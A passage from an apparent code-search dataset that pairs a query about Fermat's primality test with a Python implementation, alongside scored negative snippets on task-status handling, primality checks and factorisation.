if c.user_is_loggedin else None\r\n # Meetups are accessed through /meetups.\r\n if hasattr(item, 'subreddit') and not item.subreddit.can_view(user) and item.subreddit.name != 'meetups':\r\n return True", "def task_done(self, done, **kwargs):\n\n # If unknown task, kill execution\n if done not in self.doing:\n return\n\n # Set the task as completed\n self.done.append(self.doing.pop(self.doing.index(done)))\n\n # Call original method\n super(Queue, self).task_done(**kwargs)\n\n # Stop\n return", "def force_done(self):\n\n if self.can_done():\n return self.done()\n else:\n # we can not set that quest to done regularly, so we force it\n # nobody gets any experience and we might need a special notification for this\n self.quest.done = True\n self.quest.save()\n signals.quest_done.send(None, quest=self.quest)", "def is_emptiable(self) -> bool:\n raise NotImplementedError()", "def addSkip(self, test):\n test.status = \"skipped\"", "def uncheck(self, roommate_instance):\n if self.status == Item.PROCESSING_CODE and self.check_who == roommate_instance:\n self.status = Item.UNCHECKED_CODE\n self.check_who = None\n else:\n raise PermissionDenied", "def mark_missed(self):\n if self.state == TrackState.Tentative:\n self.state = TrackState.Deleted\n elif self.time_since_update > self._max_age:\n self.state = TrackState.Deleted", "def mark_missed(self):\n if self.state == TrackState.Tentative:\n self.state = TrackState.Deleted\n elif self.time_since_update > self._max_age:\n self.state = TrackState.Deleted", "def hide(self, item_id):\n pass", "def check_for_uncanceled(self, index):\n if 0 <= index < len(self.stops):\n stop = self.stops[index]\n if stop.status == StopStatuses.canceled:\n self.issue_time += timedelta(seconds=config.INTERVAL_BETWEEN_UPDATE_MSG)\n self.tasks.append(self.instruction_task(stop.station_url, 'prio', self.issue_time))", "def add_new_attributes(self):\n self.task = None\n self.reset_shadow()", "def entity_async_status_not(self, entity_async_status_not):\n\n self._entity_async_status_not = entity_async_status_not", "def entity_async_status_not(self, entity_async_status_not):\n\n self._entity_async_status_not = entity_async_status_not", "async def _skip(self, ctx: commands.Context):\n\n if not ctx.voice_state.is_playing:\n return await ctx.send('Cannot skip. Not playing any song right now.')\n\n voter = ctx.message.author\n if voter == ctx.voice_state.current.requester:\n await ctx.message.add_reaction('⏭')\n ctx.voice_state.skip()\n\n elif voter.id not in ctx.voice_state.skip_votes:\n ctx.voice_state.skip_votes.add(voter.id)\n total_votes = len(ctx.voice_state.skip_votes)\n\n if total_votes >= 1:\n await ctx.message.add_reaction('⏭')\n ctx.voice_state.skip()\n else:\n await ctx.send('Skip vote added, currently at **{}/1**'.format(total_votes))\n\n else:\n await ctx.send('You have already voted to skip this song.')", "def _disable(self):\n self.enabled = False", "def pending(self):\n self.update({self.STATE: self.STATE_PENDING})", "def complete(self, **kwargs):\n response = self._requester.request(\n \"PUT\",\n \"courses/{}/modules/{}/items/{}/done\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def untargeted(self):\n\t\tpass", "def set_not_ready(self):\n if self.game.has_started() or self.status == self.PLAYER_NOT_READY:\n return\n self.status = self.PLAYER_NOT_READY", "def _is_missing(self, item):\n pass", "def mark_as_in_progress(self, task):\n raise NotImplementedError('')", "def reset_continued(self): \n self._recent_goal_continued = False\n self._update_action = False\n self._update_action_without_pause = False", "def skip_post_assessment(self, _data, system):\r\n self.child_state = self.DONE\r\n return {'success': True}", "def noyable(self):\n return False", "def test_unavailable_item(self):\n item, change, _ = give_item_and_change('crisps', .50)\n self.assertIsNone(item)\n self.assertEqual(change, 0.5)", "def disable(self, index):\n self._action(index, StateVariable.enable, missingok=False, value=False)", "def markOff(isdelete = 0):\n\ttry:\n\t taskId = sys.argv[2]\n\t tasks = open(\"todo.txt\").readlines()\n\t file = open(\"todo.txt\", \"w\")\n\t doneTasks = open(\"done.txt\", \"a\")\n\t flag = True\n\t for task in range(len(tasks)):\n\t if task + 1 == int(taskId):\n\t \tflag = False\n\t \tif isdelete == 1:\n\t \t\tcontinue\n\t \telif isdelete == 0:\n\t \t\tdata = \"x {} {}\".format(datetime.today().strftime(\"%d/%m/%Y\"), tasks[task])\n\t \t\tdoneTasks.write(data)\n\t else:\n\t \tfile.write(tasks[task])\n\n\t if not isdelete:\n\t \tif flag:print(\"Error: todo #%s does not exist.\" % (taskId))\n\t \telse:print(\"Marked todo #%s as done.\" % (taskId))\n\t \n\t if isdelete:\n\t \tif flag:print(\"Error: todo #%s does not exist. Nothing deleted.\" %(taskId))\n\t \telse:print(\"Deleted todo #%s\" % (taskId))\n\n\texcept IndexError:\n\t\tif isdelete:print(\"Error: Missing NUMBER for deleting todo.\")\n\t\telse:print(\"Error: Missing NUMBER for marking todo as done.\")", "async def team_ignore(self, ctx: commands.Context):\n await self.config.user(ctx.author).do_not_message.set(True)\n await ctx.send('Okay, I won\\'t DM about this anymore.')", "def flag(self, reason):\r\n self._flagged = True\r\n self._flagged_reason = reason", "def item_done(self, rsp=None):\n self.export.item_done(rsp)", "def with_manual_check_never(self):\n self.__manual_check = constants.NEVER\n return self", "def discard(self, item):\n try:\n counter = self._get(item) - 1\n except KeyError:\n return\n\n if counter <= 0:\n self._del(item)\n else:\n self._set(item, counter)", "def set_delayed_test_to_done(self, guid_):\n db = DatabaseManager()\n query = \"\"\"UPDATE delayedTestData\n SET done=TRUE\n WHERE guid=%(guid)s\n AND done=FALSE\"\"\"\n db.execute_query_and_close(query, {\"guid\": guid_})\n return True", "def is_not_used(self):\n pass", "def ignore(self):\n self._ignore_transids = True", "def skip(self):\n self.skip_votes.clear()\n if self.is_playing():\n self.player.stop()", "async def disable(self, **kwargs) -> None: # pylint: disable=unused-argument\r\n await self.set_ena(False)", "def pending(self, pending):\n\n self._pending = pending", "def _apply_item(self, item: Item) -> bool:\n if self.locked:\n self.__locked = item.item_type != self.__key\n return not self.locked", "def reset(self):\n debug('resetting')\n self.marked = False", "def is_done():\n return False", "def add(self, item):\n self._set(item, None)", "def ignore(self, event):\n return not self.active", "def track_off(self,numero):\n if numero in self.tiempos.actual().obtener_habilitados():\n self.tiempos.actual().deshabilitar_track(numero)", "def mark_skipped(self, test):\n if not test:\n LOGGER.warn('Empty or None test name passed to standard_json_util')\n return\n\n self.tests[test] = {'expected': 'SKIP', 'actual': 'SKIP'}", "async def skip(self, ctx):\n\n state = self.get_voice_state(ctx.message.server)\n if not state.is_playing():\n await self.bot.say('Not playing any music right now...')\n return\n\n voter = ctx.message.author\n if voter not in state.voice.channel.voice_members and voter.id != INIT0:\n await self.bot.say('you are not in the current playing voice channel')\n return\n\n if voter == state.current.requester or voter.id == INIT0:\n await self.bot.say('Requester requested skipping song...')\n state.skip()\n return\n\n if state.current.requester.id == INIT0:\n await self.bot.say('nah this song is good')\n return\n\n if voter.id not in state.skip_votes:\n state.skip_votes.add(voter.id)\n total_votes = len(state.skip_votes)\n if total_votes >= state.votes_needed():\n await self.bot.say('Skip vote passed, skipping song...')\n state.skip()\n else:\n await self.bot.say('Skip vote added, currently at {}/{}'.format(total_votes, state.votes_needed()))\n else:\n await self.bot.say('You have already voted to skip this song.')", "def do_uncancel(self):\r\n self.write({'cancelled': False})", "def mark_as_unreportable(self, request, queryset):\n rows = queryset.update(reportable=False)\n if rows == 1:\n bit = \"1 harvest\"\n else:\n bit = \"%s harvests\" % rows\n self.message_user(request, \"%s marked as unreportable\" % bit)", "def assert_done(self, task):\n if task not in self.tasks_done:\n # do the task if not done\n method = getattr(self, task)\n method()", "def disable(self) -> None:", "def disable(self):\n # Check for new results and cache a copy in Django model\n self.update(do_update_assignments=True)\n self.connection.dispose_hit(self.mturk_id)", "def ignore_clicks(self):\n self._ignore_count += 1", "def action_done(self):\n if not self.date_done:\n self.date_done = fields.Datetime.now()\n if self.state_rapel == '1':\n self.generate_rapel()\n self.state = 'done'" ]
[ "0.662007", "0.62232697", "0.61218685", "0.5933863", "0.5878998", "0.58310205", "0.5791388", "0.5753141", "0.5665221", "0.56445396", "0.5607032", "0.552165", "0.552165", "0.552165", "0.552165", "0.552165", "0.5493468", "0.545121", "0.5446436", "0.54381365", "0.54248023", "0.54232657", "0.5401875", "0.5399981", "0.53973514", "0.5388705", "0.5385724", "0.53589815", "0.535629", "0.5346213", "0.53327155", "0.53295517", "0.5321923", "0.5294049", "0.5286776", "0.52845895", "0.5277851", "0.5276558", "0.5266226", "0.5262396", "0.522088", "0.519456", "0.5193986", "0.5189013", "0.5187303", "0.5176862", "0.517306", "0.5169785", "0.5163423", "0.514318", "0.5139866", "0.5136175", "0.512936", "0.5113269", "0.5113269", "0.5110818", "0.5105813", "0.51007545", "0.50958896", "0.50958896", "0.50934863", "0.5084174", "0.50823104", "0.5078781", "0.5059743", "0.5050894", "0.5043938", "0.5035689", "0.50337094", "0.5030746", "0.5024602", "0.502302", "0.50125587", "0.5004702", "0.5004387", "0.4989065", "0.49857482", "0.4982024", "0.4979534", "0.49784833", "0.49691787", "0.49680457", "0.49656525", "0.49566635", "0.4951427", "0.49461994", "0.49381524", "0.49362034", "0.49345025", "0.49237382", "0.4920169", "0.49151227", "0.48954713", "0.48922783", "0.4887596", "0.4878594", "0.48712787", "0.4860488", "0.48573866", "0.48556536" ]
0.5910725
4
fermats theorem where if a n1 = 1(mod n), n is prime,
def fermats(n): randomlist = [] for i in range(10): randomlist.append(random.randrange(2, n-1)) i += 1 for i in randomlist: if successivesquaring(i, n-1, n) != 1: return("n is composite") return("n is probably prime")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def fermat_prime(n: int, k: int) -> int:\n assert n > 3 and k >= 1\n for _ in range(k):\n a = random.randint(2, n - 2)\n if pow(a, n - 1, n) != 1: # (a**(n-1)%n) != 1:\n return False\n return True", "def prime_test(n,p):\n for i in range(2, p):\n thing = 1\n while thing == 1:\n if n % i == 0:\n n = n/i\n else:\n thing = 0\n if n == 1:\n return False\n return True", "def isPrime(n): \n if n == 2 or n == 3: return True\n if n < 2 or n%2 == 0: return False\n if n < 9: return True\n if n%3 == 0: return False\n r = int(n**0.5)\n f = 5\n #Loop seeks out next prime factor and returns it\n while f <= r:\n if n%f == 0: return (False, f)\n if n%(f+2) == 0: return (False, (f+2))\n f +=6\n return True", "def isPrime(n):\n if n == 1:\n return False\n elif n < 4:\n return True\n elif n % 2 == 0:\n return False\n elif n < 9:\n return True\n elif n % 3 == 0:\n return False\n else:\n r = int(floor(sqrt(n)))\n f = 5\n while f <= r:\n if n % f == 0: return False\n if n % (f+2) == 0: return False\n f += 6\n return True", "def is_prime(n):\n if n == 2 or n == 3: return True\n if n < 2 or n % 2 == 0: return False\n if n < 9: return True\n if n % 3 == 0: return False\n r = int(sqrt(n))\n f = 5\n while f <= r:\n if n % f == 0: return False\n if n % (f + 2) == 0: return False\n f += 6\n return True", "def is_prime(n):\n return mr_prime(n)", "def es_primo(n):\n \n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def is_prime_by_fermat_test(n, a):\n output = zn_pow(a, n-1, n) # a^{n-1}, mod n\n if output == 1:\n vprint(\"prime\")\n return True\n vprint(\"composite\")\n return False", "def primfact(e):\n for n in range(2, e):\n for x in range(2, n):\n if n % x == 0:\n break\n else:\n print n,", "def isprime(n):\r\n\treturn is_prime(n)", "def fermat_strong_test(n, a):\n if n == 2:\n return True\n # n - 1 = d * 2 ^ s\n d, s = factor_twos(n - 1)\n\n # by Fermat theorem, if n is prime then\n # (a^d - 1)(a^d + 1)(a^2d + 1)(a^4d + 1)...(a^2^(s-1)d + 1) = 0 (mod n)\n a = powmod(a, d, n)\n if a == 1 or a == n - 1:\n return True\n for _ in range(s):\n a = a * a % n\n if a == n - 1:\n return True\n return False", "def isprime(n):\n if n % 2 == 0:return False\n return all(n % i for i in range(3, int(n**0.5) + 1, 2))", "def is_prime(n):\n if n == 1:\n return False\n else:\n i = 2\n while i < n:\n if n % i == 0:\n return False\n i += 1\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n == 2 or n == 3:\n return True\n elif n % 2 == 0:\n return False\n else:\n x = 0\n for i in range(3, n, 2):\n if n % i == 0:\n x = 1\n return x == 0", "def is_prime(n):\n if n <= 1:\n return False\n elif n <= 2:\n return True\n elif n % 2 == 0:\n return False\n else:\n for i in range(3, int(n**.5) + 1, 2):\n if n % i == 0:\n return False\n return True", "def isprime(n):\n\treturn is_prime(n)", "def is_prime(n):\n if n < 1 or n % 1 > 0:\n return False\n if n == 1 or n == 2:\n return True\n for i in range(3, int(math.sqrt(n)) + 1):\n if n % i == 0:\n return False\n return True", "def isprime(n):\n if n == 2: return True\n if n == 3: return True\n if n % 2 == 0: return False\n if n % 3 == 0: return False\n i = 5\n w = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n return True", "def snt(n):\r\n f = True\r\n for j in range(2, n):\r\n if n % j == 0:\r\n f = False\r\n break\r\n return f", "def equivalence(self, n):\n return n % self.prime", "def is_prime(n):\n x = 2\n def divide_x(x):\n if x > round(pow(n, 0.5)):\n return True\n elif n % x == 0:\n return False\n else:\n return divide_x(x + 1)\n return divide_x(x)", "def isprimeF(n,b):\r\n\treturn (pow(b,n-1,n) == 1)", "def prime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def factorone(n):\n\tif (is_prime(n)): return n\n\tfor fact in (2,3,5,7,11,13,17,19,23,29):\n\t\tif n%fact == 0: return fact\n\treturn factorPR(n) # Needs work - no guarantee that a prime factor will be returned", "def isPrime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n i = 5\n w = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n\n return True", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i ** 2 <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def isprime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n return True", "def isPrime(n):\r\n # Znamo da 1 nije prost broj\r\n if n == 1:\r\n return False\r\n\r\n i = 2\r\n # Petlja se vrti od 2 do int(sqrt(x)) \r\n while i*i <= n:\r\n # Provjera da li i dijeli x bez ostatka\r\n if n % i == 0:\r\n # To znači da n ima faktor između 2 i sqrt(n)\r\n # Stoga nije prost broj\r\n return False\r\n i += 1\r\n # Ako nismo pronašli nijedan faktor u gornjoj petlji\r\n # onda je n prost broj\r\n return True", "def isprime(n):\n if n == 1:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def isprimeF(n,b):\n\treturn (pow(b,n-1,n) == 1)", "def factorone(n):\r\n\tif (is_prime(n)): return n\r\n\tfor fact in [2,3,5,7,11,13,17,19,23,29]:\r\n\t\tif n%fact == 0: return fact\r\n\treturn factorPR(n) # Needs work - no guarantee that a prime factor will be returned\r", "def is_prime(n):\n if n == 2:\n return True\n if n == 0 or n == 1 or n % 2 == 0:\n return False\n for i in range(3, int(math.sqrt(n))+1, 2):\n if n % i == 0:\n return False\n return True", "def prime_factor(n):\n while n > 1:\n k = 2 \n while n % k != 0:\n k = k+1\n n = n // k\n print(k)", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if (n%2) == 0:\n return False\n for i in range(3,integer_sqrt(n)+1,2):\n if (n%i) == 0:\n return False\n return True", "def isPrime(n):\r\n if n == 2:\r\n return True\r\n if n == 3:\r\n return True\r\n if n % 2 == 0:\r\n return False\r\n if n % 3 == 0:\r\n return False\r\n\r\n i = 5\r\n w = 2\r\n\r\n while i * i <= n:\r\n if n % i == 0:\r\n return False\r\n\r\n i += w\r\n w = 6 - w\r\n\r\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n in [2,3]:\n return True\n if n % 2 == 0:\n return False\n\n for factor in range(3, int(math.sqrt(n))+1, 2):\n if n % factor == 0:\n return False\n return True", "def is_prime(n):\n if n==1:\n return True\n def prime_helper(divisor):\n if divisor == 1:\n return True\n elif n % divisor == 0:\n return False\n else:\n return prime_helper(divisor-1)\n return prime_helper(n//2)", "def if_prime(cls, n):\n\n if (n <= 1):\n return False\n if (n <= 3):\n return True\n\n if (n % 2 == 0 or n % 3 == 0):\n return False\n\n i = 5\n while(i * i <= n):\n if (n % i == 0 or n % (i + 2) == 0):\n return False\n i = i + 6\n\n return True", "def is_prime(n, k):\n if n <= 1 or n == 4:\n return False\n if n <= 3:\n return True\n if is_even(n):\n return False\n while k > 0:\n\n # Take random int in [2, n-2]\n a = random.randint(2, n-1)\n\n # Check if a and n are co-prime.\n if gcd(n, a) != 1:\n return False\n\n # Fermat's little theorem\n if modpow(a, n-1, n) != 1:\n return False\n\n k -= 1\n\n return True", "def isPrime(n: int):\n if n <= 1:\n return False\n\n for i in range(2, n-1):\n if n % i == 0:\n # print(\"{} is divisable by {}\".format(n, i))\n return False\n\n return True", "def prime(n):\n # Case 0: n is 0, 1 or negative\n if n < 2:\n return False\n\n # Case 1: n = 2\n elif n == 2:\n return True\n\n # Case 2: n is even\n elif n % 2 == 0:\n return False\n\n # Case 3: n is odd\n for i in range(3, ceil(sqrt(n))+1, 2):\n if n % i == 0:\n return False\n\n return True", "def is_prime(n):\n\t\n\tif n < 2:\n\t\treturn False\n\t\n\tif not n % 2:\n\t\treturn False\n\t\n\tfor possible_factor in range(3, int(sqrt(n)) + 1, 2):\n\t\tif not n % possible_factor:\n\t\t\treturn False\n\treturn True", "def isPrime(n):\n for i in range (2, n/2+1):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n if n <= 1: return False\n if n <= 3: return True\n\n if (n % 2 == 0 or n % 3 == 0):\n return False\n\n i = 5\n while i * i <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True", "def is_prime(n):\n k = 2\n while n % k != 0:\n k += 1\n if k < n:\n return False\n else:\n return True", "def prime(n: int) -> bool:\n factors = find_first(lambda i: n % i == 0, range(2, int(math.sqrt(n) + 1)))\n return len(list(factors)) == 0", "def prime(n: int) -> bool:\n factors = find_first(lambda i: n % i == 0, range(2, int(math.sqrt(n) + 1)))\n return len(list(factors)) == 0", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n divisors[n] = n // 2\n return False\n if n % 3 == 0:\n divisors[n] = 3\n return False\n\n if n in primes:\n return primes[n]\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n divisors[n] = n // i\n primes[n] = False\n return False\n i += w\n w = 6 - w\n\n primes[n] = True\n return True", "def is_prime(n):\n if n == 2:\n return True\n\n if n < 2 or n % 2 == 0:\n return False\n\n for i in range(3, int(sqrt(n)+1), 2):\n if n % i == 0:\n return False\n\n return True", "def is_prime(n):\n assert n > 3\n k = int(log2(n))\n m = n - 1\n d = 0\n while(m % 2 == 0):\n m //= 2\n d += 1\n for _ in range(k):\n a = randint(2, n - 2)\n x = pow(a, m, n)\n if x == 1 or x == n - 1:\n continue\n for _ in range(d - 1):\n x = pow(x, 2, n)\n if x == 1:\n return 0\n if x == n - 1:\n break\n if x != n - 1:\n return 0\n return 1", "def is_prime(n):\n i, count = 2, 0\n while i < n:\n if n % i == 0:\n count += 1\n break\n i += 1\n if count == 0 and n != 1:\n return True\n else:\n return False", "def is_prime(n):\n for i in range(2,n):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n assert n >= 1, \"n is not a positive integer\"\n k = 2\n if n == 1:\n flag = False\n else:\n flag = True\n while k <= sqrt(n):\n if n % k == 0:\n flag = False\n break\n k += 1\n return flag", "def is_prime(n):\n if n <= 1:\n return False\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def isPrime(n):\n\n if n < 2:\n return False\n elif n in {2,3}:\n return True\n elif n % 2 == 0:\n return False\n else:\n for i in range(3,math.floor(math.sqrt(n))+1,2):\n if n % i == 0:\n return False\n else:\n return True", "def isprime(n):\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n \n if n < 2:\n return False\n elif n == 2 or n == 3 or n == 5:\n return True\n elif n % 2 == 0 or n % 3 == 0 or n % 5 == 0:\n return False\n \n i = 6\n sqrt_n = int(math.ceil(math.sqrt(n)))\n \n while i <= sqrt_n + 1:\n if n % (i - 1) == 0 or n % (i + 1) == 0:\n return False\n i += 6\n return True", "def isprime(n=936):\n if n < 3: return False\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def factorPR(n):\r\n\tfor slow in [2,3,4,6]:\r\n\t\tnumsteps=2*math.floor(math.sqrt(math.sqrt(n))); fast=slow; i=1\r\n\t\twhile i<numsteps:\r\n\t\t\tslow = (slow*slow + 1) % n\r\n\t\t\ti = i + 1\r\n\t\t\tfast = (fast*fast + 1) % n\r\n\t\t\tfast = (fast*fast + 1) % n\r\n\t\t\tg = gcd(fast-slow,n)\r\n\t\t\tif (g != 1):\r\n\t\t\t\tif (g == n):\r\n\t\t\t\t\tbreak\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn g\r\n\treturn 1", "def prime(n):\n \n flag = 1 # this will be 0 --> if no prime \n for i in range(2, n):\n if (n%i == 0):\n flag = 0\n break #Most important to break once number is decided as not prime; even once divisible, no need to check further for that number \n else :\n flag = 1\n \n return flag", "def nPrime(n):\n\n start = 1\n while n != 1:\n start += 2\n if isPrime(start):\n n -= 1\n # end of if\n\n return start", "def is_prime(n: int) -> bool:\n if n <= 3:\n return n > 1\n if n % 2 == 0 or n % 3 == 0:\n return False\n i = 5\n while i ** 2 <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True", "def prime(n: int) -> bool:\n if len(divisors(n)) > 2 or n < 1:\n return False\n else:\n return True", "def evansMod(x,n):\n if x%n == 0:\n return 1\n else:\n return 0", "def is_prime(n):\n # We know 1 is not a prime number\n if n == 1:\n return False\n\n i = 2\n # This will loop from 2 to int(sqrt(x))\n while i*i <= n:\n # Check if i divides x without leaving a remainder\n if n % i == 0:\n # This means that n has a factor in between 2 and sqrt(n)\n # So it is not a prime number\n return False\n i += 1\n # If we did not find any factor in the above loop,\n # then n is a prime number\n return True", "def is_prime(n):\n if n <= 1:\n return False\n if n < 4:\n return True\n if n % 2 == 0:\n return False\n if n < 9:\n return True\n if n % 3 == 0:\n return False\n\n limit = int(math.floor(math.sqrt(n)))\n i = 5\n while i <= limit:\n if n % i == 0:\n return False\n if n % (i + 2) == 0:\n return False\n i += 6\n return True", "def primes(n):\n primfac = {}\n primfac = defaultdict(lambda: 0, primfac)\n while (n % 2) == 0:\n primfac[2] += 1 \n n //= 2\n d = 3\n while d*d <= n:\n while (n % d) == 0:\n primfac[d] += 1 # supposing you want multiple factors repeated\n n //= d\n d += 2\n if n > 1:\n primfac[n] = 1\n return primfac", "def is_prime(n: int) -> bool:\n if n <= 1:\n return False\n\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True", "def get_prime_factor(n):\n if n % 2 == 0:\n return 2\n for num in range(3, n + 1, 2):\n if n % num == 0:\n return num", "def is_prime(n):\n for k in range(2, (n // 2) + 1):\n if n % k == 0:\n return False\n \n return True", "def factorPR(n):\n\tnumsteps=2*math.floor(math.sqrt(math.sqrt(n)))\n\tfor additive in range(1,5):\n\t\tfast=slow=1; i=1\n\t\twhile i<numsteps:\n\t\t\tslow = (slow*slow + additive) % n\n\t\t\ti = i + 1\n\t\t\tfast = (fast*fast + additive) % n\n\t\t\tfast = (fast*fast + additive) % n\n\t\t\tg = gcd(fast-slow,n)\n\t\t\tif (g != 1):\n\t\t\t\tif (g == n):\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\treturn g\n\treturn 1", "def phi(n: int) -> int:\n result = 1\n for i in range(2, n):\n if gcd(i, n) == 1:\n result += 1\n return result", "def isprime(n):\n # make sure n is a positive integer\n n = abs(int(n))\n # 0 and 1 are not primes\n if n < 2:\n return False\n # 2 is the only even prime number\n if n == 2:\n return True\n # all other even numbers are not primes\n if not n & 1:\n return False\n # range starts with 3 and only needs to go up the squareroot of n\n # for all odd numbers\n for x in range(3, int(int(n ** 0.5) ** 0.5) + 1, 2):\n if n % x == 0:\n return False\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n == 2 | n == 3:\n return True\n if n % 2 == 0 | n % 3 == 0:\n return False\n for i in range(2, int(sqrt(n))+1):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n == 2 | n == 3:\n return True\n if n % 2 == 0 | n % 3 == 0:\n return False\n for i in range(2, int(sqrt(n))+1):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n\tprime = True\n\tif n == 1:\n\t\tprime = False\n\tc = 2\n\twhile c * c <= n:\n\t\tif n % c == 0:\n\t\t\tprime = False\n\t\tc += 1\n\treturn prime", "def is_prime(n):\n\tb = 2\n\twhile b <= math.sqrt(n):\n\t\tif n % b == 0:\n\t\t\treturn False\n\t\tb += 1\n\treturn True", "def is_prime(n, k=10):\n if n == 2 or n == 3:\n return True\n if not n & 1 or n < 2:\n return False\n m = n - 1\n s = 1\n d = m >> 1\n while not d & 1:\n s += 1\n d >>= 1\n for i in range(k):\n a = randint(2, n - 2)\n x = expmod(a, d, n)\n if x == 1 or x == n - 1:\n continue\n for r in range(1, s):\n x = x * x % n\n if x == 1:\n return False\n if x == n - 1:\n break\n else:\n return False\n return True", "def test_prime(n):\n if SIEVE[n]:\n return True\n else:\n return False", "def is_prime(n):\n for k in range(2, (n // 2) + 1):\n if n % k == 0:\n return False\n\n return True", "def primenumber(x):\n if x >= 2:\n for y in range(2,x):\n if not (x % y):\n return False\n else:\n return False\n return True", "def isprime(n):\n\n if n % 2 == 0:\n return False\n\n # else take square root and iterate over all uneven (step 2) numbers\n sqrt_n = int(math.floor(math.sqrt(n)))\n for i in range(3, sqrt_n + 1, 2):\n if n % i == 0:\n return False\n\n return True", "def trial_div(n: int) -> bool:\n if n == 1:\n return False\n i = 2\n while i**2 <= n:\n if n % i == 0:\n return False\n i += 1\n return True", "def is_factor(f, n):\r\n return n%f == 0", "def isprime(n: int) -> bool:\r\n if n > 1:\r\n for i in range(2, int(n / 2) + 1):\r\n if (n % i) == 0:\r\n return False\r\n else:\r\n return True\r\n\r\n else:\r\n return False", "def is_prime(n):\n\n def prime_helper(index):\n if index == n:\n return True\n elif n % index == 0 or n == 1:\n return False\n else:\n return prime_helper(index + 1)\n\n return prime_helper(2)", "def sopf(n, primes):\r\n total = 0\r\n for p in primes:\r\n if n % p == 0:\r\n total += p\r\n while n // p == 0:\r\n n //= p\r\n return total", "def is_prime(n):\n \n for i in range(3, int(n**0.5+1), 2):\n if n % i == 0:\n print(n,'is not prime')\n return False\n\n print(n,'is prime') \n return True", "def prime_t(n: int) -> bool:\n tests = set(range(2, int(math.sqrt(n) + 1)))\n non_factors = set(takewhile(lambda i: n % i != 0, tests))\n return tests == non_factors", "def prime_t(n: int) -> bool:\n tests = set(range(2, int(math.sqrt(n) + 1)))\n non_factors = set(takewhile(lambda i: n % i != 0, tests))\n return tests == non_factors", "def is_prime(n):\n test_vals = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]\n if n in test_vals:\n return True\n d = n - 1\n s = 0\n while not d & 1:\n d = d >> 1\n s += 1\n for a in test_vals:\n for r in range(0, s):\n if (a ** (d * (1 << r))) % n != (n - 1) \\\n and (a ** d) % n != 1:\n return False\n return True", "def isPrime(n: int) -> bool:\n if n == 1:\n return False\n # handle boundary conditions\n if n == 2 or n == 3:\n return True\n # Now check for divisibility of n by 2 & 3\n if n % 2 == 0 or n % 3 == 0:\n return False\n\n i = 5\n while (i * i <= n):\n if n % i == 0 or n % (i + 2) == 0:\n return False\n\n i = i + 6\n return True", "def is_Prime(n):\n\n # make sure n is a positive integer\n n = abs(int(n))\n # 0 and 1 are not primes\n if n < 2:\n return False\n # 2 is the only even prime number\n if n == 2:\n return True\n # all other even numbers are not primes\n if not n & 1:\n return False\n # range starts with 3 and only needs to go up the squareroot of n\n # for all odd numbers\n for x in range(3, int(n ** 0.5) + 1, 2):\n if n % x == 0:\n return False\n return True", "def is_prime(n, i):\r\n if n == 2: # 2 is prime\r\n return True\r\n\r\n elif n < 2: # less then 2 or even not prime\r\n return False\r\n\r\n elif n % i == 0: # divisible by 3 or greater not prime\r\n return False\r\n\r\n else:\r\n if int(n ** 0.5) + 1 == i: # no divisor found then prime\r\n return True\r\n else:\r\n return is_prime(n, i + 1) # recursive step\r", "def is_prime(n):\n if n < 2 or n - round(n) != 0:\n print('Numbers smaller than 2 and non-integers are never prime.')\n return False\n if n == 2:\n return True\n if n % 2 == 0:\n return False\n for i in range(3, int(sqrt(n)+2), 2):\n if n % i == 0:\n return False\n return True", "def primes1(n):\n sieve = [True] * (n//2)\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i//2]:\n sieve[i*i//2::i] = [False] * ((n-i*i-1)//(2*i)+1)\n return [2] + [2*i+1 for i in range(1,n//2) if sieve[i]]", "def 